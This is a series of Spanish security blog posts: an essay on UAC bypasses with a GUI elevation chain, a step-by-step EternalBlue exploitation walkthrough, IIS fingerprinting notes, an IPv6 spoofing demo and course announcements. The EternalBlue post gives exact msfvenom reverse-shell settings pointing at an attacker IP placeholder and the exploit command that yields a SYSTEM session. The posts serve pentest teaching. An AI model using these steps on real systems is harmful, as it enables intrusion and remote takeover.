Cuándo un Bypass de UAC en Windows es un "Bug" o una "Feature"

El artículo de hoy lo escribo por algunas razones, las cuales comentaré en breve. El punto para reflexionar es: ¿Qué es un bypass de UAC? Para muchos una técnica desprestigiada en un Ethical Hacking, para otros una vía a tener en cuenta en la obtención de privilegios o la obtención de una shell en un nivel de integridad alto de Windows.  Puedo equivocarme en lo que comente en este artículo o puede que tengas otra visión, pero vamos a ir viendo y matizando ciertos aspectos que cubren a esta técnica. 

Figura 1: Cuando un Bypass de UAC en Windows es un "Bug" o una "Feature"

Lo primero, y seguramente más importante, ¿Es una vulnerabilidad? Para Microsoft no es una vulnerabilidad, es una opción de configuración. Y, técnicamente, es cierto. Es decir, si cambias la configuración por defecto del UAC, la inmensa mayoría de los bypasses conocidos dejan de funcionar. El mecanismo de UAC funciona, solo que depende de su configuración. 

Figura 2: Máxima Seguridad en Windows Gold Edition

Por supuesto, si lo que quieres es aplicar Máxima Seguridad a tu Windows, esto es algo que se aplica en primer paso. Es decir, quitar la configuración por defecto y aplicar la que exige a todos los binarios la confirmación UAC, y no permite el autoelevado. Vamos un poco más allá para entenderlo. ¿Cómo nos protegemos de los bypasses de UAC? Vamos primero a ver la GPO, para lo que buscamos: 

Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> User Account Control: Behaviour of the elevation prompt for administrators in Admin Approval Mode

Ahí encontraremos uno de los motivos por los que los bypasses de UAC funcionan. Como se puede ver en la imagen, se pedirá consentimiento, por parte del UAC, solo a los procesos que no sean binarios de Windows. Realmente, hay un mayor detalle en esto que comentaré a continuación.

Figura 3: Política para UAC para los binarios que no son de Windows

Aparte de ser un “binario de Windows”, que esto no es más que se encuentre firmado por Microsoft, éste debe ser además un binario con una directiva en el Manifest con “Auto-Elevate”  con valor "True". Es decir, le están diciendo al sistema que el binario, aparte de estar firmado por Microsoft, éste tiene una especie de “carnet especial” o “pase especial” y que no debe rendir cuentas al UAC. 

Por último, otra de las comprobaciones que hace el sistema es que el binario se esté ejecutando en una ruta “privilegiada”, por ejemplo, System32. Si recordamos el bypass de UAC de Mocking Directory Trusted, gracias a un fallo de interpretación de una de las APIs internas del sistema se podía “saltar” esta protección.

Figura 4: Libro de Hacking Windows

Desde el punto de vista del pentesting tenemos que tener en cuenta algunas cosas también. Lo que parece más lógico, pero que a veces la gente puede no entender bien es que, para pasar a un nivel de integridad alto, debes de estar en otro nivel de integridad, inferior se entiende. 

En el caso de un bypass de UAC debes partir desde un nivel de integridad medio. Por esta razón, el módulo de Metasploit, cuando se hace cualquier bypass de UAC de forma automática, nos muestra los diferentes chequeos, entre ellos el nivel de integridad actual.

Figura 5: ByPass de UAC en Metasploit

Como se puede observar, una de las cosas que se chequean es el nivel de integridad. Si estuviéramos en un nivel de integridad alto y no nos hubiéramos dado cuenta, sería una cosa muy extraña, porque demostraríamos no tener el control de lo que hacemos, pues ya estaríamos “elevados”, por lo que no tendría sentido realizar esta operación. Puede que nuestro proceso no se encuentre en un nivel de integridad medio y estemos más abajo, tendremos problemas también. Debemos entender por qué estamos y debemos estar en este nivel de integridad.

Esto va relacionado con el tipo de usuario que debemos ser. Solo podemos ser un usuario que forme parte del grupo administradores, pero que no esté ejecutando el proceso como administrador. Esto es importante. Es otra cosa que a veces no queda clara. 

Figura 6: Metasploit para Pentesters Gold Edition

Necesitamos que un usuario que tiene privilegios para realizar acciones como administrador, haya ejecutado un proceso y que no haya hecho uso de dichos privilegios para, una vez comprometido su proceso, podamos aprovechar este hecho y hacer el bypass de UAC. Puede ser lioso, pero es lógico. Si el usuario hubiera lanzado el proceso como administrador, el nivel de integridad ya sería alto, no medio.

Como se veía en la imagen anterior, el módulo de Metasploit comprueba si el usuario al que pertenece el proceso comprometido es o no es del grupo administradores. Si no es del grupo administradores, ¿Qué ocurre? Es sencillo, la política de comportamiento del UAC asociada es diferente. Tal y como se puede ver en la imagen, la acción por defecto para un usuario que no pertenece al grupo administradores es que el UAC pida credenciales.

Figura 7: Selección de opción de pedir credenciales

Windows Vista, en el comienzo de la historia del UAC, utilizaba un comportamiento más estricto, pedía confirmación (Sí o No) para los administradores, independientemente de si el binario estuviera o no firmado por Microsoft o si tenía o no Auto-Elevate. 

Figura 8: Configuraciones de los Modos UAC en Windows 7

¿Era más seguro? A priori, y basándonos en este artículo, sí. Pero las quejas llegaron. Los usuarios no estaban preparados para ello y se rebajaron algunas configuraciones. Esto fue en Windows 7, si no recuerdo mal, que puedo recordarlo mal.

Y un bypass de UAC entonces, ¿dónde tiene sentido?

Yo siempre digo en las clases o en los cursos/talleres que un bypass de UAC se enseña en local, pero su aplicación tiene sentido en remoto. Es decir, por motivos de divulgación y educación se puede enseñar en local todo el proceso de lo que ocurre, no solo quedaros con se lanza un módulo de Metasploit y listo, eso es la automatización y está bien, una vez que se conoce qué ocurre por detrás. 

Miramos con ProcMon y Proccess Explorer lo que ocurre, se estudian diferentes técnicas: Environment Injection, DLL Hijacking, Fileless… O jugamos con nuestro querido UAC-A-Mola y vemos qué cosas se pueden hacer.


Figura 9: UAC-a-Mola: Bypassing UAC using Fileless techniques
Pero a la hora de poner en práctica o de utilizar en un Ethical Hacking solo tiene sentido en remoto, porque si tienes un usuario que cumple los requisitos del bypass de UAC y tienes acceso físico te vale ejecutar:

 “botón derecho -> Ejecutar como administrador” 

Bien, pero ¿cómo hacemos eso en remoto? Es complejo. Vamos a tener una shell remota con la que podemos ver fácilmente si tenemos la posibilidad de utilizar técnicas de bypass de UAC y si estamos en ese caso, ¿cómo se aplican? ¿Ejecutas botón derecho -> admin? No. No puedes. Aquí es dónde tiene todo el sentido del mundo las técnicas de bypass de UAC.

Desde una shell invocarás a un binario que cumple las tres necesidades comentadas anteriormente, previamente habrás preparado el camino para que la ejecución de dicho binario desemboque en que el nuevo proceso haga uso de tu código, y como ese proceso se estará ejecutando en un nivel de integridad alto, tu código también se ejecutará en el mismo nivel de integridad.

Ahí tenemos el bypass, porque gracias a las características del binario, el UAC dejará ejecutarlo. Y en esto se resume. Hemos hablado mucho en este blog sobre diferentes bypasses de UAC, cómo han ido evolucionando las técnicas, cómo a veces se simplificaban y ahí están los artículos

Para mí: ¿Qué no es un bypass de UAC?

Si desde la GUI de cualquier binario se puede ejecutar código, pero no se puede hacer a través de una consola, para mí no es un bypass de UAC efectivo. Puede que, técnicamente se haga un bypass de UAC, porque evitemos que se ejecute el UAC y se ejecute un código nuestro. ¿Nos aporta algo más que darle al botón derecho -> "ejecutar como administrador"? Eso es lo que nos tenemos que preguntar, es decir, ¿podremos utilizarlo?

Aquí tenemos una bifurcación: bypass de UAC efectivo para el pentesting o bypass de UAC que prueba un concepto, pero no es efectivo para el pentesting. Como ejemplo podemos utilizar algunos ejemplos con interfaces gráficas.

Técnicamente, lo que veremos ahora consigue hacer que un CMD se ejecute y no salte el UAC. Sabemos que cuando se intenta ejecutar una CMD con privilegio, el UAC saltará para confirmación del usuario o petición de credenciales en el caso de un usuario que no sea del grupo administradores. Tenemos que pensar, ¿se puede usar en un pentest? Eso es más complejo.  Lo primero es utilizar un binario de los que sabemos que ejecutan en un nivel de integridad alto sin que el UAC salte, por ejemplo, el eventvwr.exe en Windows 10.

Figura 10: EventViewer tiene Auto-Elevate True

Desde aquí, todo lo que sea código que se ejecute heredará el nivel de integridad alto, por lo que podemos ir al menú “Help”. La opción “Help Topics” nos muestra la ayuda del visor de eventos. Pinchando con el botón derecho en la parte donde se muestra el texto se puede ver una opción que es “View Source”.

Figura 11: View Source

Al ejecutar “View Source” se ve un bloc de notas con un texto. Claro, si analizamos el bloc de notas con Proccess Explorer podremos ver que el notepad.exe se ejecuta en un nivel de integridad alto. Aquí ya tenemos lo que buscamos, si abrimos un cuadro de diálogo tenemos la posibilidad de ejecutar lo que se quiera.

Figura 12: notepad.exe con nivel de integridad alto

Abrimos el cuadro de diálogo y buscamos en System32 el binario del CMD. En vez de abrirlo sobre el notepad.exe, botón derecho y abrir el cmd.exe. Ahí lo tenemos. ¿Podríamos haberlo hecho a través de una shell? Si encontramos la forma de hacer que todo esto se pueda hacer desde una línea de comandos, tendríamos, desde mi opinión, un bypass de UCA efectivo, si no, simplemente hemos demostrado o enseñado que hay código que puede ser ejecutado sin que el UAC salte, pero no termina de ser efectivo en un pentesting o en un Ethical Hacking.

Figura 13: CMD.exe elevado sin UAC

En la siguiente imagen de Process Explorer se puede ver el nivel de integridad y cómo desde el mmc.exe (abierto con eventvwr.exe directamente) sin que el UAC salte, porque es un binario que cumple las condiciones comentadas anteriormente, se van abriendo diferentes procesos hasta llegar a una cmd.exe.

Figura 14: Nivel de Integridad "High"

Vale, pero, ¿es efectivo? Cuando se lee bypass de UAC, una de las cosas que debemos valorar es efectivo o no. Generalmente, cuando hablamos de bypass de UAC entendemos que es una vía por la que se obtiene privilegios saltándonos el UAC y nunca a través de algo gráfico, porque no habría diferencia con “botón derecho -> ejecutar como admin”. El debate está servido. Tú decides.

Saludos,

Autor: Pablo González Pérez (@pablogonzalezpe), escritor de los libros "Metasploit para Pentesters", "Hacking con Metasploit: Advanced Pentesting" "Hacking Windows", "Ethical Hacking", "Got Root",  “Pentesting con Powershell” y de "Empire: Hacking Avanzado en el Red Team", Microsoft MVP en Seguridad y Security Researcher en el equipo de "Ideas Locas" de la unidad CDCO de Telefónica.  Para consultas puedes usar el Buzón Público para contactar con Pablo González

Figura 15: Contactar con Pablo González

Cómo explotar Eternalblue en Windows Server 2012 R2 por @UnaPibaGeek

Creo que, si hay algo en lo que todos estamos de acuerdo, es que la curiosidad es un factor clave en el camino de la seguridad informática. En mi caso, la curiosidad es tan grande que un día me veras hablando de hacking de automóviles, otro de hacking con drones, otro de malware por Cloud Services y es que, para mí, ¡todas las áreas de seguridad informática son apasionantes! Pero, aquellos que me conocen bien, saben que mi mayor debilidad pasa por el área de "exploit writing", posiblemente por la dificultad y el desafío que representa escribir exploits.

Figura 1: Cómo explotar EternalBlue en Windows Server 2012 R2

Fue entonces que, cuando el grupo TheShadowBrokers publicó el leak con exploits de la NSA, fui una de las primeras en meterme con todo en aquel fascinante arsenal de herramientas. Como parte de esa investigación, escribí un paper de la explotación de Eternablue en Windows 7 y Server 2008 R2, que se publicó tanto en inglés como en español en popular sitio exploit-db.

Figura 2: Lista de exploits para Windows publicados por TheShadowBrokers

Por supuesto que muchos especialistas, investigadores y apasionados del reversing pusieron bajo su lupa a Eternablue. Como resultado de ello, el security researcher Sleepya, publicó en su Github una versión de dicho exploit para Windows Server 2012 R2, objetivo originalmente no soportado. Pero la realidad es que incluso el propio autor de esa versión del exploit no publicó ninguna explicación ni demostración de que realmente funcionara, peor aún, la gente que comentaba haberlo probado decía que no le había funcionado.

Figura 3: Módulo asm del exploit publicado por sleepya

Fue entonces cuando decidí mirar dicho código, entenderlo y buscar la manera de tener un impacto exitoso.Para lograrlo, es necesario llevar adelante una serie de pasos y tener en cuenta algunas cosas que detallaré a continuación.

Paso 1: Ensamblar la Kernel Shellcode

Primero es necesario utilizar la kernel shellcode desarrollada por Sleepya.  Como se puede observar, es un .asm que debemos ensamblar y para ello utilizaremos NASM con el siguiente comando: nasm -f bin kernel_shell_x64.asm

Figura 4: Compilación de la kernel shellcode desarrolladad por sleepya

Paso 2: Generar la Userland Shellcode

Un payload de Metasploit generado con msfvenom será la userland shellcode que acompañará a la kernel shellcode ensamblada en el paso anterior. Los parámetros que utilizaremos en msfvenom serán los siguientes:

-p windows/x64/merterpreter/reverse_tcp
-f raw
-o meterpreter_msf.bin
EXITFUNC=thread
LHOST=[IP_ATACANTE]
LPORT=4444 (u otro puerto en la máquina atacante)

Figura 5: Generación de la Userland Shellcode con msfvenom

Paso 3: Unir Kernel Shellcode + Userland Shellcode

Para tener un impacto exitoso, debemos pasar ambas shellcodes como parámetro al exploit. Para ello, las uniremos en un mismo archivo en formato .bin haciendo un simple “append” de una shellcode con la otra.

Figura 6: Uniendo ambas shellcodes

Tras ejecutar el comando que vemos en la imagen superior, tendremos un nuevo archivo “meterpreter.bin” que contiene tanto la kernel shellcode ensamblada como la userland shellcode que generamos con msfvenom.

Paso 4: Configurar el listener de Metasploit

El paso previo al lanzamiento del exploit, es configurar el listener de Metasploit para que reciba la conexión inversa del meterperter una vez que el impacto sea exitoso. Para ello simplemente utilizaremos el módulo de exploit/multi/handler con el payload de meterpreter.

Figura 7: Configuración del listener de Metasploit

Paso 8: Lanzamiento del exploit

Utilizaremos el exploit de Sleepya publicado en su GitHub. Está desarrollado en Python, por lo tanto, lo guardaremos en la máquina atacante con extensión .py.

Figura 8: Merge_shellcode de Sleepya

Acto seguido, abriremos ese archivo .py con un editor de texto y nos dirigiremos a las líneas 42 y 43 donde debemos indicar la cuenta de usuario que el exploit utilizará para autenticación. La misma tendremos que haberla conseguido previamente o bien, podemos utilizar la cuenta de Guest si se encuentra activa en el sistema operativo objetivo.

Figura 9: Configuración de cuenta

Guardamos y procedemos a ejecutar el exploit con los siguientes parámetros:

python exploit.py ip_target meterpreter.bin 200

El parámetro con valor “200” corresponde al “numGroomConn”. El ajustar la cantidad de conexiones “Groom” ayuda a alcanzar un pool de memoria contigua en el kernel para que la sobreescritura del buffer termine en la ubicación que deseamos y lograr ejecutar la shellcode correctamente. 

Figura 10: Lanzamiento del exploit con 200 conexiones Groom

Para esta userland shellcode utilizaremos un número de conexiones Groom de 200. Si al impactar no recibimos la conexión inversa, podemos probar incrementando este número de a 50. Inmediatamente recibiremos la sesión de meterpreter en la terminal de Metasploit.
>

Figura 11: Conexión Meterpreter conseguida con éxito

Cabe destacar que nos encontramos en una sesión de SYSTEM, aunque hayamos utilizado para autenticarnos una cuenta Guest. En el siguiente vídeo tienes la ejecución de este exploit en acción.

Figura 12: PoC de Explotación de EternalBlue en Windows Server 2012 R2

Sin dudas Eternablue es un exploit que aún no deja de sorprender. Lo considero tan así, que le dedique otro paper más, donde se explica con mayor detalle el procedimiento que hemos realizado a lo largo de este post y que os dejo aquí.

Figura 13: Cómo explotar EternalBlue en Windows Server 2012 R2 

El mismo ya fue publicado por exploit-db y puedes leerlo en inglés o en español:  :-). Espero que se hayan divertido tanto como yo! Gracias por leer!.

Autor: Sheila A. Berta (@UnaPibaGeek)

Security Researcher at ElevenPaths.

Request Filtering en Internet Information Services y sus errores

Hace un par de días os conté como se podía jugar con los mensajes de error en un servidor Microsoft Internet Information Services en un dominio de Apple para localizar un nodo de una arquitectura en cluster que era vulnerable. Bajo esa misma premisa quise hacer algo similar con los servidores que dan soporte al sitio web www.microsoft.com que por supuesto también es publicado bajo una buena cantidad de máquinas.

Figura 1: Request Filtering en IIS y sus errores

Al final, tras horas de juegos, pruebas y darle la vuelta a Internet buscando información, acabe dando con un pequeño detalle de la configuración por defecto de IIS y Request Filtering. No es que sea de enorme importancia, pero espero que os entretenga la historia para este domingo. Os la narro según yo la fui pensando.

Los servidores en la web de www.microsoft.com

Como os he dicho, todo comenzó con la búsqueda de los servidores detrás de www.microsoft.com. Mirando en los Response Headers, se puede ver que ahora hay servidores con versiones de Microsoft IIS 8.0 y Microsoft IIS 8.5. No hay más que hacer varias peticiones y comprobar como varía el campo.

Figura 2: Servidor IIS 8.0 en www.microsoft.com

Figura 3: Servidor IIS 8.5 en www.microsoft.com

Jugando con los mensajes de error en ellos, se puede ver que están configurados de la misma forma, así que no sucede lo mismo que sucedía en el caso del otro día. Todos parecen correr sobre Windows Server 2012 y con las mismas configuraciones. Salían cosas curiosas, no obstante, así que decidía jugar un poco con ellos. El Error 404 genérico controlado es el que se puede ver a continuación.

Figura 4: Error 404 controlado en www.microsoft.com

Como curiosidad, pensé que tendría gracia ver el Error 404 del framework PHP, y la verdad es que no me equivoqué y salía algo bastante peculiar, que puedes ver aquí, ya que contesta con un Error 304.

Figura 5: Error 304 cuando se pide un fichero PHP (debería ser un 404 normal)

También volví a probar el Error 500 del RunTime del framewok .NET para hacer saltar las protecciones contra ataques de XSS y HTML Injection que incorpora esta tecnología, tal y como ya había visto atrás.

Figura 6: Error 500 en www.microsoft.com

En este punto, me acorde de algo que tal vez sí pudiera ayudarme en las pruebas. El módulo de seguridad para filtrar el QueryString que lleva Microsoft Internet Information Services. Este módulo se llama Request Filtering - antes conocido como URLScan -.

Request Filtering en Microsoft Internet Information Services

El módulo que acompaña a los servidores Microsoft IIS desde la versión 7.0 hasta la versión 8.5, pasando por IIS 7.5 e IIS 8.0 lleva por nombre Request Filtering y es una evolución del anterior URLScan que se utilizaba en los servidores Microsoft IIS hasta la versión 7.0. Este módulo puede filtrar por muchas característica, y una de ellas es la extensión del fichero solicitada, como se ve en la imagen siguiente.

Figura 7: Request Filtering

Como ya os conté en el artículo de "¿Y tú cómo juegas con el QueryString en un pentesting?", todos los módulos que van recibiendo las peticiones pueden tratarlas o no, y generar códigos de respuesta con páginas por defecto para atender la petición. Así, una URL puede ser procesada y respondida por el core del servidor web, pero también por los motores de cada uno de los lenguajes que soporte una determinada instalación, o, si hay un WAF, por el módulo de seguridad - algo que hemos visto en el artículo de Cómo hacer cantar al WAF.

Figura 8: Reglas de bloqueo de ataques de SQL Injection en Request Filtering

Con Request Filtering se pueden configurar reglas para bloquear tipos de ficheros, extensiones, o expresiones regulares en la URL, bloqueando ataques de SQL Injection, de MongoDB Injection, o lo que quieras. De hecho, como es programable en tiempo real se pueden montar escenarios de virtual patching modificando las reglas de Request Filtering en tiempo real.

En este caso, Request Filtering también procesa las peticiones y genera un mensaje de error con páginas de respuesta que podrán estar controladas por el administrador del sitio para que el usuario tenga un mensaje friendly o dejadas por defecto. Como se puede ver, en el caso de www.microsoft.com al solicitar una URL con un fichero de extensión filtrada la respuesta no está modificada.

Figura 9: Una extensión filtrada por Request Filtering en www.microsoft.com

La lista de extensiones de ficheros que se bloquean por defecto en Request Filtering es de más de 40, y están entre ellos algunos como .dd, .ldf, .java, .mdb, etcétera. Y en ese punto llegó mi pregunta. ¿Habrá algún fichero que esté bloqueado en algunas versiones? Si fueran varios y disjuntos, tal vez se  podría llegar a realizar una detección de la versión de IIS simplemente por el tratamiento que hace Request Filtering a cada una de las peticiones. Y continué probando cosas.

Extensiones de Fichero bloqueadas por Request Filtering

No fue trivial localizar las extensiones de ficheros que vienen bloqueadas por defecto en todas las versiones de Request Filtering que acompañan a cada versión de IIS. Además, algunas extensiones no están filtradas en Request Filtering por defecto, pero software de SharePoint u Office Web Server - por poner dos ejemplos - pueden modificar esa lista, además del propio administrador del sitio. 

Figura 10: Extensiones filtradas por Request Filtering por defecto en algunos IIS

Ésta es la lista de configuraciones por defecto que fui capaz de localizar sin tener que instalarme todas las versiones de IIS. Como veis falta la de IIS 8.5, así que si lo instalas y me confirmas la lista de extensiones te lo agradeceré.

Al hacer la comparación entre las extensiones que están bloqueadas en uno y otro, se puede ver que hay pocas diferencias. La principal diferencia es que en IIS 7 no se filtraba la extensión .rules. Esto hace que si el servidor es un IIS con version IIS 7.5 o superior vaya a generar un mensaje de error igual para las peticiones foca.rules que para foca.dd o foca.mdb.

Figura 11: Error 404 al pedir una extensión filtrada por Request Filtering en IIS 7.0

Sin embargo, si es una versión de IIS 7.0, puede que nos encontremos con que foca.rules y foca.dd tienen tratamientos de error distintos. En .NET los ficheros .rules tienen un funcionalidad muy específica y por eso da un Error 403 en este caso.

Figura 12: En este caso es el framework .NET el que prohibe la extensión .rules

Esto puede ayudar a primero, localizar un nuevo mensaje de error, y dos conocer mejor el servidor web con el que estamos trabajando.

La extensión rules en IIS 6.0

Cuando estamos con un servidor IIS 6.0, aprovechando que .rules está prohibido por el framework, siempre podremos forzar un error para sacar información de la versión .NET que está instalada.

Figura 13: Error 403 en un IIS 6.0 al pedir la extensión .rules

Al final son pequeños detalles, pero como sabéis, la suma de todos acaba ayudando a hacer un pentesting completo. Ojo, depende de la personalización de cada sitio puede ser que no siempre se consiga el resultado esperado, pero por lo menos tienes un punto más por el que tirar. Espero que la lectura os haya entretenido, que yo pasé todo un sábado dándole vueltas a esto, que no tenía otra cosa mejor que hacer.

Saludos Malignos!

Te van a hackear por IPv6 por pensar que no lo utilizas

Se acabó la Gira Up To Secure 2013 y tras impartir 10 conferencias de hacking en IPv6 me sigue fascinando que la mayoría de la gente piensa que no usa nunca IPv6. Puede que incluso tú pienses que no usas nunca IPv6, y lo cierto es que en todos los equipos Windows Vista, Windows 7, Windows 8, Windows Server 2008, Windows Server 2008 R2 y Windows Server 2012 viene configurado por defecto.

Para demostrarle a la gente que su Windows utiliza IPv6 por defecto, y que según la configuración por defecto tiene prioridad sobre IPv4, les hago una demo muy sencilla, pero que a muchos sorprende - y que deberías hacerla por ti mismo si aún no has tomado conciencia del riesgo -  paso a paso: La "peligrosa" demo del ipconfig + ping.

Paso 1: Primero hacemos un ipconfig en un Windows, para que se vea que existe la dirección IPv6 de vínculo local. Si te sale esa dirección, entonces continúa con el paso 2 que de momento vamos bien.

Figura 1: ipconfig en un Windows con configuración por defecto. Hay local-link IPv6.

Paso 2: Desde un equipo de tu red haz un ping -a a una dirección de algún equipo de tu red que esté en el mismo segmento físico. Es importante esto, porque por defecto IPv6 no viene configurado con default gateway - eso ya lo haremos a posteriori con un DHCPv6 o un paquete RA para hackear toda la red, pero de momento basta con que esté en tu mismo segmento.

Figura 2: ping -a a una dirección IP del mismo segmento de red

Paso 3: Una vez hecho eso, haz un ping al nombre NetBIOS del equipo que te ha salido. No lo hagas al FQDN por si solo tienes un DNS en la red IPv4. Esto hará que el protocolo LLMNR busque por toda la red todas las direcciones IPv4 e IPv6 asociadas a este nombre, buscando los registros A y AAA usando los DNS en IPv4 e IPv6 - los dos tipos de registros en los dos servidores - y la difusión broadcast. Si todo ha ido bien, te habrá contestado el equipo, pero desde la dirección IPv6.

Figura 3: Ping al nombre del servidor utiliza IPv6

Si esto te ha dado positivo - que te dará - entonces estás vendido a un ataque de Neighbor Spoofing en IPv6 que podrá ser utilizado para robar ficheros SMB y no servirá de nada que monitorices la tabla ARP con arp -a, ya que todo el ataque tiene efecto en la lista de vecinos que puedes ver con netsh interface ipv6 show nei.

Figura 4: Tabla de vecinos IPv6

A partir de ese punto, tu red está preparada para sufrir un ataque de los gordos en los que el atacante use Rogue DHCPv6, SLAAC y DNS Autodiscovery para ownearte toda la infraestructura. Pero eso...ya os lo cuento en la próxima RootedCON.

Mientras tanto, haz un route print y comprueba que no existe ningún gateway en eso que tienes ahí abajo, la tabla de enrutamiento IPv6 de tu red. La puerta de enlace, como ya os conté en los conceptos básicos de IPv6, se denota con la dirección ::0.

Figura 5: Tabla de enrutamiento en IPv6 sin puerta de enlace por defecto configurada

Si he conseguido que prestes atención a "tu" IPv6, tal vez deberías leer algo más y repasar estos artículos, para que conozcas más de lo que se te puede venir encima.

Saludos Malignos!

***************************************************************************************************
- Hacking en redes de datos IPv6: Conceptos básicos IPv6 (1)
- Hacking en redes de datos IPv6: Conceptos básicos IPv6 (2)
- Hacking en redes de datos IPv6: Te hackearán por IPv6 por creer que no lo usas
- Hacking en redes de datos IPv6: Neighbor Spoofing
- Hacking en redes de datos IPv6: Captura de SMB con Neighbor Spoofing
- Hacking en redes de datos IPv6: FC00::1 (Algunos) Ataques en redes de datos
- Hacking en redes de datos IPv6: Man in the middle en redes IPv4 usando IPv6
- Hacking en redes de datos IPv6: Desactivar IPv6 para evitar D.O.S. SLAAC
- Hacking en redes de datos IPv6: Topera - Scanner de puertos sobre IPv6
- Hacking en redes de datos IPv6: Predecir direcciones IPv6 Local-Link de OS X
- Hacking en redes de datos IPv6: Ataques en redes de datos IPv 4 e IPv6 ***************************************************************************************************

iT Camps, Up To Secure y Cursos en Bilbao, Palencia, Valladolid, Palma de Mallorca, Móstoles, Getafe y Online

Hoy estamos en Barcelona, este viernes 18 de Enero da comienzo el FTSAI 9 con un grupo de estudiantes de lo más populoso, y ya en la semana que viene, sin quererlo, se ha dado una conjunción de actividades tal, que nos ha construido un calendario de lo más repleto que puede darse. Entre unas cosas y otras, no importa de qué parte del mundo seas, que seguro que puedes asistir a algo - si te apetece -, ya que hay actividades en distintos formatos y a casi cualquier hora. Esta es la lista:

Evento Gratuito: Gira Up To Secure 2013

Durante la semana que viene la Gira Up To Secure 2013 pasa por 3 nuevas ciudades. El evento es de mañana y puedes apuntarte en los siguientes enlaces:

Martes 22: Bilbao [Registro]
Jueves 24: Valladolid [Registro]
Viernes 25: Palma de Mallorca [Registro]

Curso gratuito IT Camp: Despliegue de aplicaciones en Windows 8

También son gratuitos, tienen una duración de tres horas y puedes apuntarte en los siguientes enlaces:

Martes 22: Bilbao [Registro]
Jueves 24: Valladolid [Registro]
Viernes 25: Palma de Mallorca [Registro]

Jornadas de Seguridad en Villamuriel (Palencia)

Como ya hiciera el año pasado, regreso a Villamuriel en Palencia, pero con más ponentes esta vez. Entre ellos estará el gran Mikel Gastesi (@mgastesi), escritor del libro de Fraude Online. Será el miércoles día 23 de Enero, y  tienes toda la información del evento en la web: Jornadas de Seguridad en Villamuriel (Palencia).

Cursos presencial y online de Metasploit para Pentesters

Nuestro compañero Pablo González, escritor del libro de "Metasploit para pentesters", impartirá dos formaciones dedicadas al framework de exploiting por excelencia, en formatos presencial y online, comenzando los días 21 y 22 de Enero. Tienes más información de estos dos cursos en el siguiente enlace: Cursos de Metasploit para Pentesters.

Curso de Ataques en redes de datos IPv4 e iPv6 en Móstoles

El último curso, que será de Ataques en redes de datos, dará comienzo el miércoles 23 de Enero en las oficinas de Informática 64. En él podrás jugar entre otras cosas con algunas de nuestras herramientas internas, y llevarte el libro de Ataques en redes de datos IPv4 & IPv6. 

One more thing....

Además de todo esto, el lunes día 21 darán comienzo los dos cursos de Seguridad Antihacking en Getafe, el día 22 estaré en la Radio a las 11:30, como todos los martes, y el sábado 26 iré a dar clase a mis chicos del Master de Seguridad de la UEM, a los que tendré el placer de ponerles también un examen que os dejaré publicado ese mismo día - por si os apetece hacerlo a vosotros. ¿Será o no será movidita la semana que viene?

Saludos Malignos!

Para aprender cosas en Diciembre y estar formado en 2013

... Y casi sin quererlo llegamos ya al último mes de este duro año 2012 que ya casi termina. Y como es habitual mes a mes, os voy a dejar la lista de las acciones formativas que tenemos previstas para este mes de Diciembre, que en Informática64 seguimos con el trabajo diario, que no se diga. Para ello, tenemos planificados cursos en nuestras oficinas y cursos online. Este es el calendario:

03/12 al 05/12 [Móstoles] Curso de Despliegue de Windows 8
10/12 al 14/12 [Móstoles] Curso de Administración de Windows Server 2012
17/12 al 20/12 [Móstoles] Curso de desarrollo de aplicaciones Android
17/12 al 20/12 [Online] Curso de Análisis Forense de dispositivos móviles

Si quieres formarte en FOCA puedes matricularte en cualquier momento al Training Online de FOCA contactando con registro@informatica64.com que se realiza en cualquier momento que tú quieras y llevarte la FOCA PRO para tus auditorías. Ademas, ya puedes reservar tu plaza para la 9º Edición de nuestra Formación Técnica en Auditoría y Seguridad Informática (FTSAI), que como sabéis dura 150 horas y se realiza los viernes en nuestras instalaciones.

Por último, si no puedes venirte a ninguna de las formaciones, te recuerdo que tenemos unos Packs de libros especiales para estas navidades que te permitirán llevártelos a mejor precio - incluso la biblioteca completa - y aprender mucho, mucho, mucho estas navidades. ¡Qué no se diga que no te preparas para lo que venga en 2013!

Saludos Malignos!

Nuevo Libro de Windows Server 2012 para IT Pros

Como ya os había dicho, este verano en Informática64 hemos estado trabajando para sacar un libro con todas las novedades de Windows Server 2012 para los IT Pros, y ya lo podéis comprar. El libro ya está físicamente en nuestras manos, así si lo compras, en un tiempo record podrás empezar a leerlo. Si quieres ver los contenidos del libro puedes ver el índice en formato PDF.

Si quieres aprender de este tema, además del libro puedes descargarte la imagen VHD de Windows Server 2012 lista para montar en tu Hyper-V o la versión final ISO de evaluación para que puedas probar en tu entorno todas las pruebas que nosotros hacemos desde cero. 

Este libro es ya el número 16 de la colección de libros de Informática 64 que queda ya como sigue:

- Libro 16: Windows Server 2012 para IT Pros
- Libro 15: PowerShell, La navaja suiza de los administradores
- Libro 14: Desarrollo de Aplicaciones iOS para iPhone & iPad: Essentials
- Libro 13: Ataques en redes de datos IPv4 e IPv6
- Libro 12: Hacking de Aplicación Web: SQL Injection
- Libro 11: Aplicación del Esquema Nacional de Seguridad con Microsoft
- Libro 10: Seguridad y Hacking de comunicaciones Móviles: GSM/GPRS/UMTS
- Libro 9: Máxima Seguridad en Windows: Secretos Técnicos
- Libro 8: Fraude Online: Abierto 24 x 7
- Libro 7: Hacking con Buscadores: Google, Bing y Shodan
- Libro 6: Una al Día, 12 años de Seguridad
- Libro 5: DNI-e: Tecnología y usos
- Libro 4: MS SharePoint 2010: Auditoría y Seguridad
- Libro 3: MS Forefront TMG 2010
- Libro 2: Aplicación de medidas técnicas y organizativas para aplicar la LOPD
- Libro 1: Análisis Forense en Sistemas Windows

Os recordamos que ya tenemos un partner que distribuye nuestros libros en Argentina - Root Secure -,  en Colombia - IT Forensic - y Ecuador - HCKS_ec - , por lo que podéis solicitárselo a ellos directamente si eres de ese país o te pilla más cerca que solicitarlo a España.

Saludos Malignos!

Asegúr@IT Camp 4: Vente al campo de entrenamiento

Ya puedes ir haciendo el petate, y poniéndote en forma, porque ya tenemos listo el Asegúr@IT Camp 4, para que te vengas a pasar un fin de semana con nosotros al Camping de El Escorial. Este evento que llevamos realizando desde el año 2009 es muy especial para mí, ya que al final del fin de semana todos los asistentes acaban creando lazos de unión muy especiales debido al formato del mismo, que paso a describiros.

Como sabéis, todo comienza con la llegada y entrega de Cabañas de Madera el viernes. Tras dejar el petate y acomodarse cada uno en su habitación, esa noche yo siempre tengo que encargarme de controlar a las "fieras" para que la cena que organizamos no acabe durando más allá de una hora prudencial y que las conversaciones, debates, fotos, cánticos y chistes de la cena duren para la noche del sábado.

